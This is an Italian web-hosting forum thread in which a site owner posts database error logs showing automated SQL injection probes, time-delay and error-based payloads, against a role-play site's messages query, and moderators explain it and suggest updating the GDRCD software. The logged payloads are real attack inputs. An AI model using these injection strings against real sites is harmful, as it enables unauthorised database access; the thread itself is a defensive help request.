Visualizzazione risultati 1 fino 3 di 3

Discussione: Attacchi al database

  1. 29-02-2024, 11.10.15 #1
    testgdr1
    testgdr1 non è connesso Neofita
    Data registrazione
    07-11-2018
    Messaggi
    4

    Predefinito Attacchi al database

    Ho ricevuto dal mio log interno una serie di errori strani che sembrano attacchi SQL Injection, ai quali però io non riesco a captare l'ip, la url del mio sito è: https://testgdr1.altervista.org/
    Codice:
    -------------IP: 
-----------INIZIO ERRORE IN DATA: 27/02/2024 05:17:23----------------
ERROR QUERY: 
    SELECT * 
    FROM messaggi 
    WHERE   destinatario = '' 
        AND destinatario_del = 0 AND tipo =0);if(1=1) waitfor delay \'0:0:3\'--
    ORDER BY spedito DESC LIMIT 0, 40
ERROR [1064]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ');if(1=1) waitfor delay \'0:0:3\'--
    ORDER BY spedito DESC LIMIT 0, 40' at line 4
------------------------FINE ERRORE------------------------------------------

-------------IP:  
-----------INIZIO ERRORE IN DATA: 27/02/2024 05:17:40----------------
ERROR QUERY: 
    SELECT * 
    FROM messaggi 
    WHERE   destinatario = '' 
        AND destinatario_del = 0 AND tipo =0 or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#
    ORDER BY spedito DESC LIMIT 0, 40
ERROR [1022]: Can't write; duplicate key in table '/var/tmp/#sql2bb0a8_635ca9f9_2'
------------------------FINE ERRORE------------------------------------------

-------------IP: 
-----------INIZIO ERRORE IN DATA: 27/02/2024 05:17:40----------------
ERROR QUERY: 
    SELECT * 
    FROM messaggi 
    WHERE   destinatario = '' 
        AND destinatario_del = 0 AND tipo =0 and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#
    ORDER BY spedito DESC LIMIT 0, 40
ERROR [1022]: Can't write; duplicate key in table '/var/tmp/#sql2bb0a8_635caa02_2'
------------------------FINE ERRORE------------------------------------------

-------------IP:  
 -----------INIZIO ERRORE IN DATA: 27/02/2024 05:17:41----------------
ERROR QUERY: 
    SELECT * 
    FROM messaggi 
    WHERE   destinatario = '' 
        AND destinatario_del = 0 AND tipo =0) or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a) and (1=1
    ORDER BY spedito DESC LIMIT 0, 40
ERROR [1064]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)' at line 4
------------------------FINE ERRORE------------------------------------------

-------------IP:  
-----------INIZIO ERRORE IN DATA: 27/02/2024 05:17:42----------------
ERROR QUERY: 
    SELECT * 
    FROM messaggi 
    WHERE   destinatario = '' 
        AND destinatario_del = 0 AND tipo =0) and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a) and (1=1
    ORDER BY spedito DESC LIMIT 0, 40
ERROR [1064]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0' at line 4
------------------------FINE ERRORE------------------------------------------

-------------IP:  
-----------INIZIO ERRORE IN DATA: 27/02/2024 05:17:42----------------
ERROR QUERY: 
    SELECT * 
    FROM messaggi 
    WHERE   destinatario = '' 
        AND destinatario_del = 0 AND tipo =0\' or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#
    ORDER BY spedito DESC LIMIT 0, 40
ERROR [1064]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0' at line 4
------------------------FINE ERRORE------------------------------------------

-------------IP:  
-----------INIZIO ERRORE IN DATA: 27/02/2024 05:17:43----------------
ERROR QUERY: 
    SELECT * 
    FROM messaggi 
    WHERE   destinatario = '' 
        AND destinatario_del = 0 AND tipo =0\' and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#
    ORDER BY spedito DESC LIMIT 0, 40
ERROR [1064]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(' at line 4
------------------------FINE ERRORE------------------------------------------

-------------IP: 
-----------INIZIO ERRORE IN DATA: 27/02/2024 05:17:43----------------
ERROR QUERY: 
    SELECT * 
    FROM messaggi 
    WHERE   destinatario = '' 
        AND destinatario_del = 0 AND tipo =0�\' or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#
    ORDER BY spedito DESC LIMIT 0, 40
ERROR [1064]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0' at line 4
    Voi di altervista con l'orario non riuscite a capire cosa possa essere?
    Ultima modifica di testgdr1 : 29-02-2024 alle ore 11.16.17
  2. 29-02-2024, 21.42.13 #2
    L'avatar di alemoppo
    alemoppo
    alemoppo non è connesso Staff AV
    Invia un messaggio via MSN a alemoppo
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    23,246

    Predefinito

    Citazione Originalmente inviato da testgdr1 Visualizza messaggio
    Voi di altervista con l'orario non riuscite a capire cosa possa essere?
    Non ho capito: "cosa possa essere" in che senso?

    Comunque, sql injection è il modo più comune di attacco, non dovrebbe più esserci alcuna vulnerabilità in questo tipo di attacchi.

    Ciao!
  3. 29-02-2024, 21.44.14 #3
    L'avatar di dreadnaut
    dreadnaut
    dreadnaut non è connesso Super Moderatore
    Data registrazione
    22-02-2004
    Messaggi
    6,322

    Predefinito

    La tua intuizione è corretta: il tuo sito accetta parametri e li inserisce nelle query, rendendolo vulnerabile ad attacchi di SQL injection.

    Fortunatemente per te non è un attacco mirano, ma probabilmente uno script automatico in cerca di vulnerabilità: invece di danneggiare i tuoi dati, sta cercando più informazioni.

    Prova ad aggiornare GDRCD, e se il problema continuo vedi se gli sviluppatori hanno una soluzione → https://github.com/GDRCD/GDRCD/issues
    chezDreadnaut
« Discussione precedente | Prossima discussione »

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •  

Regole del forum